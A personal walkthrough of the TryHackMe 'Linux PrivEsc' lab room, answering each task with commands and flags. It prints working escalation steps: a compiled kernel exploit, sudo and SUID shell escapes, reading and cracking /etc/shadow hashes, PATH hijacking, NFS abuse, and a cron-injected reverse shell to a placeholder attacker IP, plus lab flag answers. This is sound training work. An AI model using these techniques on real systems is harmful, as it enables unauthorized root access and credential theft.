Linux PrivEsc
This is my walkthrough for the TryHackMe Room: Linux PrivEsc.
Last updated
This is my walkthrough for the TryHackMe Room: Linux PrivEsc.
Last updated
This room can be found . This room covers a few methods of escalating from a normal user to the root user on a system.
This task has us launch a machine and access it via the browser OR ssh into the machine with the username karen and password Password1.
Enumeration is typically one of the first steps you take when gaining access to a system.
wade7363 - We run hostname to find our answer.
3.13.0-24-generic - We can run uname -a to find this info
Ubuntu 14.04 LTS - We can run cat /etc/issue OR cat /etc/os-release to find this issue
2.7.6 - Running python -V will show this info
This task has us find a vulnerability (found from task 3) to exploit the machine with to gain access to the root account. We will obtain .c file exploit, get it to our victim machine, compile it, run it, and become root.
THM-28392872729920 - After downloading the .c file exploit from Task 3, we can get it onto our victim machine in whatever we can. A common way is via a Python Webserver.
Now we can wget the file to the /tmp/ directory on the victim
Now we need to compile the code. gcc pwn.c -o pwned and execute the new file ./pwned
We verify we have escalated our privilege and are the root user with whoami. We should see root.
To find the flag I ran find / -name flag*.txt.
We can now cat the file to receive our flag.
3 - we can run sudo -l to find this answer. She has access to find, less, and nano.
So let's run sudo find . -exec /bin/sh ; -quit and see if we get root.
We do! So now we can find our flag.
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1 - The /etc/shadow file contains information about a Linux system's users, their passwords, and more. So if we cat that file, we can get franks password hash
gerryconway - Like in Task 6, we can list users and password using /etc/shadow, except we don't have permission, there is another file we can view though. /etc/passwd.
Be sure to copy the contents of the /etc/passwd file to a .txt file
This basically says if we assign the variable of LFILE to to a file, then use base64 to encode, then decode that file, we can then read that file. Since we are after the password for the user, we want to the see the /etc/shadow file.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
Now we can use unshadow from the JohnTheRipper package to combine the files
Time to crack the passwords!
john --wordlist=(WORDLIST.TXT) (FILE.TXT)
THM-3847834 - Since we execute commands as root using the base64 SUID, we can find this with the same method.
Running find / -name flag3.txt reveals it is under /home/ubuntu/, so cd to that directory.
This task focuses on Capabilities to gain root access. Root gives Karen access to use vim, but that is all. This shows us how that can be leveraged to become root.
6 - Running getcap -r / 2>/dev/null will give us our answer. If we ran this without the 2>/dev/null we would also see a lot of errors on screen.
After testing the first 2 Shell options, I found the 3rd option worked ./vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'. Running THIS vim rather than the one inside of /usr/bin/ will get us our root shell.
THM-9349843 - After obtaining root, we can find the file location, cat it, obtaining our answer.
In this task we figure out how leverage Cron Jobs, schedule tasks, to become root.
4 - We can look at /etc/crontab to find this answer. This is available for nay user to look at.
THM-383000283 - If we ls we see we have a backup.sh file, which that is also in our crontab. We can look at the contents on the backup.sh file, also make a backup of it as well with cp backup.sh backup.sh.bak. Looking at the original with ls -l, we notice it is not executable, so let's fix that with chmod +x backup.sh. We can edit the .sh file and add in a reverse shell command.
bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1
In another terminal we can start our netcat listener
Now we wait for the crontab to run. After a minute or two, we should receive our root shell.
123456 - Running cat /etc/shadow | grep matt will give us his hash. Copy that to a .txt file and crack it.
/home/murdoch - Running find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u will show us our answer. So we have write access to murdochs home folder.
THM-736628929 - The hint from the question with no answer is "You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."
First we need to locate the file.
Now we echo $PATH
Now we add the folder we have write access to, to our path with export PATH=/home/murdoch:$PATH.
Now we create a file called thm with the contents of cat /home/matt/flag6.txt under /home/murdoch, then we change the permissions of the file with chmod 777 thm.
From here we can run ./test and obtain our flag.
3 - Running showmount -e (IP) will give us our answer
3 - Running cat /etc/exports will give us our answer. This checks the NFS configuration
THM-89384012 - We can now mount the NFS onto our machine mount -o rw (IP):(FOLDER) (FOLDER_ON_OUR_MACHINE)
The room gives us an executable we can run on the machine. I made a file nfs.c with the contents
Now we can compile it with gcc nfs.c -o nfs -w. Change the permissions of the file, chmod +s nfs
We can now execute the file on the target machine from the tmp directory, cd /tmp && ./nfs and obtain root. We can then obtain our flag with cat /home/matt/flag7.txt.
User: leonard
Password: Penny123
For this, this is utilizing how a lot of the tools and methods we have used in the previous tasks. We can SSH into the machine and begin.
THM-42828719920544 -
Started this by looking at the SUID Permissions.
We can see that base64 can be used. So as in Task 7, we can follow the same suit.
So let's try to cat the /etc/shadow file.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
We can get the hashes for root, and missy.
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
We can put these files in a .txt file and attempt to crack them.
We got the password for Missy! So lets switch users to missy. su missy
sudo find / -name flag*.txt We now have the location of our flags as well
THM-168824782390238 -
Sadly we don't have permission to the 2nd flag but lets see what sudo permissions Missy has with sudo -l
We see Missy can run find. Similar to task 6, we can use the GTFO bin we used for that.
sudo find . -exec /bin/sh ; -quit
We are now root, can cat our file for our final flag!
cat /home/rootflag/flag2.txt
CVE-2015-1328 - If we search our kernel version, 3.13.0-24-generic, on ExploidDB we find .
THM-402028394 - We cna look on and look for ways to use the commands Karen does have access to run with sudo rights. Looking up find we see:
sudo nmap --interactive - Searching for Nmap on will give us our answer.
Password1 - The room lets us know we can run find / -type f -perm -04000 -ls 2>/dev/null to find SUID permissions. After looking through this list and comparing it to , I find one that they have in common, base64.
View - Since we can see that Karen can use vim, we look through the to see that we can escalate our privileges. If we ls we see karen has a vim file in her directory, but it's owned by root, which means we can leverage this to gain root.
We can use tools such as that was discussed in Task4 but for now we'll go over the manual ways that were covered.
